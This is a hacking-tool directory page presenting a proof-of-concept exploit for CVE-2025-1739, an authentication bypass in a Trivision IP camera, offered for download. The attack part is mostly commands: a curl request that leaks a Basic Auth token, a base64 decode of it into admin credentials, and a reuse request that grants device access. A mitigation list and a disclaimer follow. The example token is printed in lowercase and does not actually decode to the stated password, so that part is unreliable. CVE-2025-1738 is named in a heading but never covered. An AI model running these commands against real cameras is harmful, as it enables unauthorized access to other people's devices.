Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-1739 — 0day PoC for CVE-2025-1739 | Kitploit
Tools/GitHubGitHub/n0n4m3x41/cve-2025-1739
Authentication & AuthorizationEmbedded Systems SecurityIoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationLearning & Education
GitHubn0n4m3x41/cve-2025-1739

CVE-2025-1739

0day PoC for CVE-2025-1739

View Repository
4 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-1738 & CVE-2025-1739 — Trivision Camera NC227WF PoC

📋 Overview

CVECVSS v3.1ScoreCWEType
CVE-2025-1739AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N7.1CWE-288Authentication Bypass via Basic Auth Leak

🔓 CVE-2025-1739 — Basic Auth Code Exposure / Auth Bypass (CWE-288)

Description

The camera leaks a valid Base64-encoded Basic Authentication token through the mblogin.asp endpoint. This token can be trivially decoded and reused to gain unauthorized access to the device — no password knowledge required.

  • Attack Vector: Adjacent Network (AV:A)
  • CVSS Score: 7.1
  • CWE: CWE-288 (Authentication Bypass Using an Alternate Path or Channel)

Payload

root@kitploit:~
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/mobile/mblogin.asp
image

Example Response

The response contains a valid Basic Auth token:

root@kitploit:~
ywrtaw46vw5ndwvzc2fibguxmjmh

Decoding the Token

root@kitploit:~
echo "ywrtaw46vw5ndwvzc2fibguxmjmh" | base64 -d
# Output: admin:unguessable123!

Reusing the Token

root@kitploit:~
curl -H "Authorization: Basic ywrtaw46vw5ndwvzc2fibguxmjmh" http://<CAMERA_IP>:<PORT>/

🛡️ Mitigation

  • Upgrade firmware if a patched version is available from Trivision.
  • Isolate the camera on a dedicated VLAN with no external access.
  • Firewall the camera's management port from untrusted network segments.
  • Change default credentials and rotate passwords regularly.
  • Monitor for unexpected access to activex_pal.asp and mblogin.asp.

⚖️ Disclaimer

This repository is for educational and authorized security research only. The authors are not responsible for any misuse. Always obtain explicit permission before testing any device.

Download Tool